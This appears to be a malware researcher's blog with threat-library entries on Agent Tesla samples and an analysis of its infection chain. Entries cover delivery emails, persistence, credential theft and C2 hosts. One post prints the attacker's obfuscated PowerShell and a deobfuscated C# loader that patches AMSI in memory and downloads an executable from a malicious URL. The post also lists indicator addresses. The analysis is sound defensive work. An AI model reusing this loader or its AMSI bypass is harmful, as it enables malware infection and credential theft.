Showing posts with label agenttesla. Show all posts
Showing posts with label agenttesla. Show all posts

Thursday, April 29, 2021

Threat Library - Agent Tesla

 Agent Tesla

---------------------------------------------------

date: 5/5/2021

delivery: Unknown

persistence: scheduled Task, \Updates\SPjSKjh, c:\users\<userid>\appdata\roaming\spjskih.exe

capabilities (per memory strings): Keylogger (KeyDown, KeyboardState, StartKeyLogger), Credential Theft (UCBrowser, Vivaldi, Thunderbird, etc.)

c2s: unknown

identification method: filname similar to previous (vbc.exe) and other patterns match like re-launch EXE after 1min45sec, smtp type c2 possible, etc.

special notes: .net executable, starts execution at about ~14 to 15mb initially, waits about 1 min 45 seconds, then relaunched itself, new pid, 2nd executable waits several minutes to do anything, then checks for credentials (chrome, qqbrowser, ultravnc, thunderbird, waterfox, etc.) through disk and registry, in memory strings on 2nd end up including the credential theft, also this has "Snake Keylogger" inside it per strings, as well as API.Telegram.org connections and possible SMTP c2 with email address

samples: 

EXE - https://www.virustotal.com/gui/file/089d065fe8e39f8b19a726cb15ac216e352a5576f446c5fc38486f1fbb7a1d9c/detection

links: 

https://twitter.com/neonprimetime/status/1389964247942279168

screenshots: 













---------------------------------------------------


date: 4/29/2021

delivery: email [Subject: New PO#422328, ISO (PO#0422328.pdf.iso) w/ EXE inside (PO#04222328.pdf.exe)]

persistence: startup registry entry (hkcu\software\microsoft\currentversion\run, gqxRqe, c:\users\<userid>appdata\roaming\gqxRqe\gqxRqe.exe)

capabilities (per memory strings): Keylogger (KeyDown, KeyboardState), Credential Theft (UCBrowser, Vivaldi, Thunderbird, etc.)

c2s: unknown

identification method: strings in memory matching previously seen ( %mailaddres%%password%%smtp%%toemail% )

special notes: .net executable, link to torproject.org download in .net code, code for webrequest and smtpclient, double file extension (PO#04222328.pdf.exe), starts execution at about ~14 to 15mb initially, waits about 1 min 45 seconds, then relaunched itself, new pid, 2nd executable waits several minutes to do anything, only gets to ~17mb or 18mb, then checks for credentials (chrome, qqbrowser, ultravnc, thunderbird, waterfox, etc.) through disk and registry, in memory strings on 2nd end up including the credential theft

samples: 

ISO - https://www.virustotal.com/gui/file/f07b343d5a7b752a5b396b06174428a66ab98d8bb28bf33e9ea911797c32af2d/detection

EXE - https://www.virustotal.com/gui/file/83bcf31fc0d06b39c6cce6bc074cde9033f5e378f0104da887ec3f924f73376a/detection

links: 

https://twitter.com/neonprimetime/status/1387837559531786243

screenshots: 










---------------------------------------------------

 date: 10/13/2020

delivery: email [Subject: Request for Quotation, Link to DOC (http://107.173.219[.]56/document ), downloads EXE from same domain ( http://107.173.219[.]56/tmt.exe ), runs Equation Editor exploit (EQNEDT32.EXE)]

persistence: unknown

capabilities (per memory strings): unknown

c2s: smtp.yandex[.]ru

identification method: twitter replies

special notes: child processes of "vbc.exe" and "RegAsm.exe"

samples: 

DOC - https://app.any.run/tasks/0410129a-646d-4c19-8207-081679403171/

links: 

https://twitter.com/neonprimetime/status/1316107602942668800

screenshots: 








---------------------------------------------------

Posted by at 6 comments:
Labels: , ,

Tuesday, August 4, 2020

Agent Tesla , Doc => Powershell => C# => EXE => SMTP

https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

function funcDecodeNetClassSourceCode {
 param($paramEncodedNetClassSourceCode)
 $xorKey='s7c5f8';
 $varDecodedNetClassSourceCode='';
 for ($i=0; $i -lt $paramEncodedNetClassSourceCode.length; $i+=2){
  $varEncodedHexBytes=[convert]::ToByte($paramEncodedNetClassSourceCode.Substring($i,2),16);
  $varDecodedChar=[char]($varEncodedHexBytes -bxor $xorKey[($i/2)%$xorKey.length]);
  # write-host ("Encoded: {0} , Decoded: {1}" -f ($varEncodedHexBytes, $varDecodedChar)) # watch every character get xor decoded
  $varDecodedNetClassSourceCode+=$varDecodedChar
 }
 return $varDecodedNetClassSourceCode;
}
$varEncodedNetClassSourceCode = '06440a5b0118204e104103554842105c085f53641a46125d1e193140084c1a5a061b2f560752115a166b1645155c055d000c16460f561417304c154c165a4d710f5914590c4612511044584015511d5043661f4b07520e1b2f774842105c085f53641a46125d1e192d5012037e3d134004541a5443560a590044434c05014700054e3d7c1f5b2a58165701434b170d5d01590659550a511b265b124a0a670c5c084c4e152450126801580074025c0152104644112e4716570a5110171041074c1a5443501e4c16450d152f5607671747465d460e540105103a591765124a5352060005005f4417470f5614171756500d110f071c5d63375b0f7c0b481c45171d445316450d500a0b41154f70084c014e335a0f56070a41790959177b0a571459014e411c3b4806550f5c0518004302410f5b53521b41034a1d172a5b1268074543475f5d150e551d154c015e0d52464f42535b065e11486c27590a711e470c471210515c0647085d1f0451174a7d1d43114c36571a591708446e1a451740075423450c41035b07154a68164d115b0a56464b0756175c0518164f1750145653550c5a0a1802015a0754595b7e0d41364c01171206525b1704561933711d433341141817565a54505e421b165c084c53515753505b5f581641464d1a591715035d120507544f0328730f592f55035811414e1a3852115b035440054d510a54511b265b124a0a670c5c084c4e1531410a751c41067803551c451a174a6b16432f54154c3645115a140515560f4603112e44175412511017064d125d015943430951171712545e0f4403001d2f560767174746504b550751050e5f7e0d41364c01170000055c121b0a5b121809555b045500171e5845135a1f5e0015154c12430a5646511d43435b000b4456021d4f433a591765124a535d0500570c4e455a500001451f1407040d16524b17570a46565205535b470f5656575e4655411c4f031a514b5f000d420342082f5607671747486216450c1c1d711d43334114181d00540c050516025a02525b5b5d0500570c5f405157535d161f4106540d12065300050b46020104540d4a055201560843020604500c46154a1c5d51151f0d02510110165e7c084c2343111b3c5d01584a4e33711d43334114180253000253055b622a5b126807454a005d4d1a591715175b465157025b08485e051d170e4a0551544e5644005a564a49175454004a080b035319094d07171256535e47004a1c1d7a0a43066e3b18100f0756070508071b065714434f05534a080b0e53485d711d4333411418160f550602053e5611460e591f1922590a57107f2459095a125b4b064f033e5611460e591f19205a16415b545b5105595f074f505e0e40534f064f0302565b02510c101f0d5011183a591765124a5b5954025f5b5d630c7c084c45034b1c4d080b07530404115f525b03555c5f044a0e1b450e4417470f5614171057500b440a265b105101580d58035607192450127e1c5b0750146812430b1d2356055e115a08551659171b354816540a540a7e1c5b07501416324713590f5b12430a5a087c1243021c461353153f69005c400e50575e1a531c4342545a4652061d440d17025104040d43154a0e085d04173450047b1f5e065b12105a19275a11561f58025120511f524b42545a4652061d440911035004510c46020004510d10025204500d41070501050944025105540d45075401040941065a04570d12035a01000840060205560d12075b01050945025a045109120650015e0947035605540d42075004510946020605000d43065604510910025605070911075001560945154a19155a4504541c5d6801580050154b2043024712711d510c151e5b11020508085d04173347095b16441066125901432a5b00575b440103550f5a0c3347095b1644101b354c1245171d1e5b1102051c5d4a164316470818430c1e45135a1f5e0015154c12430a56464b07450a5b011804050100035d5b4417470f56141717505f5b411e1846124a1a590415035d46545b08444b445456535e1a484417470f561417110c035e4a015e1744031558111d0f5607170a085603535e5f41030110054d79035614430b0e0f134e054a4e04410752435053014403000825571d41064712162758214c125d5b43060c050a5d641657154c015e0d524e515f054a19570e5a0c110c035e4a0148084e5b1b56111c4e5d460e54010566165256565e635b5e4c074f1d165256565e163f520d5212502e1e5848145d0742115b464a4a52050c50030e4a';
$varNetClassSourceCode = funcDecodeNetClassSourceCode($varEncodedNetClassSourceCode);
write-host ("Everything Decoded: {0}" -f $varNetClassSourceCode)
# Add-Type -TypeDefinition $varNetClassSourceCode; # add malicious code to this powershell session
# [yc947f]::nf37aa(); # initiate malicious code by calling function within the decoded class



---------------------
Results
---------------------
Everything Decoded: using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.N
et;
public class yc947f{[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr e5974c(IntPtr ee5c8,string
 tc65b8d);[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr r9ef96(string w1d838);[DllImport("kerne
l32",EntryPoint="VirtualProtect")]public static extern bool q6922a(IntPtr q34cd35,UIntPtr da9a6f1,uint f4f6c,out uint eea2da)
;[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void qa8774c(IntPtr h8bddc6,IntPtr c5
cda,int zb8138d);public static int nf37aa(){IntPtr jf514=r9ef96(w2b5ee("125a105c485c1f5b"));if(jf514!=IntPtr.Zero){IntPtr n77
9c=e5974c(jf514,w2b5ee("325a105c355b12592140005e1645"));if(n779c!=IntPtr.Zero){UIntPtr qdc75=(UIntPtr)5;uint qc5f47=0;if(q692
2a(n779c,qdc75,0x40,out qc5f47)){Byte[] c8dca={0x31,0xff,0x90};IntPtr e863d=Marshal.AllocHGlobal(3);Marshal.Copy(c8dca,0,e863
d,3);qa8774c(new IntPtr(n779c.ToInt64()+0x001b),e863d,3);}}}string sb637=Environment.GetFolderPath(Environment.SpecialFolder.
ApplicationData) + "\\fd393b8" + w2b5ee("5d521b50");new WebClient().DownloadFile(w2b5ee("1b4317455c175c5116520f4c17520256074b
1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016"),sb637);ProcessStartInfo xcb5f=new ProcessStartIn
fo(sb637);Process.Start(xcb5f);return 0;}public static string w2b5ee(string te9c2){string ee5c8="s7c5f8";string r9ef96="";for
(int i=0; i<te9c2.Length;i+=2){byte e5974c=Convert.ToByte(te9c2.Substring(i,2),16);r9ef96+=(char)(e5974c^ee5c8[(i/2)%ee5c8.Le
ngth]);}return r9ef96;}}














https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;
# [yc947f]::nf37aa() # malicious entry point
public class yc947f{
 [DllImport("kernel32",EntryPoint="GetProcAddress")]
 public static extern IntPtr funcKernel32GetProcAddress(IntPtr paramHandleToDll,string paramLibraryName);
 
 [DllImport("kernel32",EntryPoint="LoadLibrary")]
 public static extern IntPtr funcKernel32LoadLibrary(string paramDllName);

 [DllImport("kernel32",EntryPoint="VirtualProtect")]
 public static extern bool funcKernel32VirtualProtect(IntPtr paramMemoryAddress,UIntPtr paramMemorySize,uint paramNewProtectionValue,out uint paramOldProtectionValue);
 
 [DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]
 static extern void funcKernel32RtlMoveMemory(IntPtr paramDestinationAddress,IntPtr paramSourceAddress,int paramLengthOfBytes);

 public static int nf37aa(){
  # malicious entry point, patching AMSI Dll and a C# downloader
  string varDllName = funcDecodeString("125a105c485c1f5b");
  Console.WriteLine(String.Format("Dll: {0}", varDllName));
  IntPtr varHandleToDll=funcKernel32LoadLibrary(varDllName);
  if(varHandleToDll!=IntPtr.Zero){
   string varFunctionName = funcDecodeString("325a105c355b12592140005e1645");
   Console.WriteLine(String.Format("Function: {0}", varFunctionName));
   IntPtr varHandleToFunction=funcKernel32GetProcAddress(varHandleToDll,varFunctionName);
   if(varHandleToFunction!=IntPtr.Zero){
    UIntPtr varMemorySize=(UIntPtr)5;
    uint varOldProtectValue=0;
    if(funcKernel32VirtualProtect(varHandleToFunction,varMemorySize,0x40,out varOldProtectValue)){
     Byte[] var3BytesToCopy={0x31,0xff,0x90};
     IntPtr varHandleToAllocatedMemory=Marshal.AllocHGlobal(3);
     Marshal.Copy(var3BytesToCopy,0,varHandleToAllocatedMemory,3);
     # funcKernel32RtlMoveMemory(new IntPtr(varHandleToFunction.ToInt64()+0x001b),varHandleToAllocatedMemory,3); # overwrite bytes in function
    }
   }
  }
  string varFileName = funcDecodeString("5d521b50");
  Console.WriteLine(String.Format("File: {0}", varFileName));
  string varFileFullPath=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\fd393b8" + varFileName;
  Console.WriteLine(String.Format("Path: {0}", varFileFullPath));
  string varUrl = funcDecodeString("1b4317455c175c5116520f4c17520256074b1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016");
  Console.WriteLine(String.Format("Url: {0}", varUrl));
  new WebClient().DownloadFile(varUrl,varFileFullPath); # download the malware
  ProcessStartInfo varProcessToRun=new ProcessStartInfo(varFileFullPath);
  # Process.Start(varProcessToRun); # run the malware
  return 0;
 }
 public static string funcDecodeString(string paramEncodedString){
  string varXorKey="s7c5f8";
  string varDecodedString="";
  for (int i=0; i<paramEncodedString.Length; i+=2){
   byte varEncodedByte=Convert.ToByte(paramEncodedString.Substring(i,2),16);
   varDecodedString+=(char)(varEncodedByte^varXorKey[(i/2)%varXorKey.Length]);
  }
  return varDecodedString;
 }
}








Dll: amsi.dll
Path: C:\Users\Win7\AppData\Roaming\fd393b8.exe
Url: http://fugitdeacasa.ro/wp-content/upgrade/files/obi.exe

Agent Tesla

c2 terminal6.veeblehosting.com
tcp port 587

https://app.any.run/tasks/ca52c30e-92fb-41ee-92cf-0483b357cbfb
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/community








agent tesla
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/behavior/C2AE

smtp

port 587

"terminal6.veeblehosting.com"
"obi@a-t-mould.com"
{obi@a-t-mould.com}
{obi@a-t-mould.com}










Posted by



at





1 comment:
  


















Labels:
,
,
,
,
,

















        

      









Subscribe to:
Posts (Atom)